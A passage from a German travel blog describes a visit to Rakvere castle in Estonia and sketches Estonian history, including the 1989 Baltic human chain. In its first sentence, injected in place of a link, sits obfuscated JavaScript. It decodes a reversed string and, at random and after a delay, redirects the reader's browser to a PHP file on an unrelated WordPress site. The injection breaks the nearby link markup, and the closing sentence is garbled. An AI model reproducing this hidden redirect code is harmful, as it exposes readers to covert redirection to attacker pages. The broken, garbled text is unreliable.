Der nächsten Tag (ist irgendwie ironisch, es ist ja immer Tag hier 😉 fahren wir zum $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonia” href=”http://www.visitestonia.com/en/holiday-destinations/city-guides/rakvere” target=”_blank”>Rakvere (zu deutsch Wesenberg) besuchen wir die teilweise sehr gut erhaltene Burg und erfahren dabei, dass am nächsten Tag das 10-jährige Jubiläum mit allen wichtigen Vertretern von Rakvere und Umgebung stattfinden wird. Die Burg ist schön geschmückt und steht imposant in mitten der Stadt auf dem Burgberg.
Alle Städte und Dörfer ja bis jetzt all die Teile in Estland haben eine sehr lange und teils sehr schwere tonia” href=”http://de.wikipedia.org/wiki/Geschichte_Estlands” target=”_blank”>Geschichte. Wurde Estland in den letzten zweitausend Jahren immer mal wieder durch Deutschland, Polen, Russland und andere Nationen besetzt.
Die wirkliche Befreiung für die Esten fand vor 20 Jahren statt und dies erreichten die Esten und die übrigen baltischen Staaten ganz ohne Gewalt. Sie bildeten eine Menschenkette durchs ganze Baltikum mit einer Länge von 650 km, die von Litauen (Vilnius) über Lettland (Riga) bis nach Estland (Tallinn) reichte. Am 23.08.1989 befreiten sich die Livländer auf diese Weise von Russland. Zudem ist es in Estland seit 1869 brauch, das tolz des jungen, freien Landes.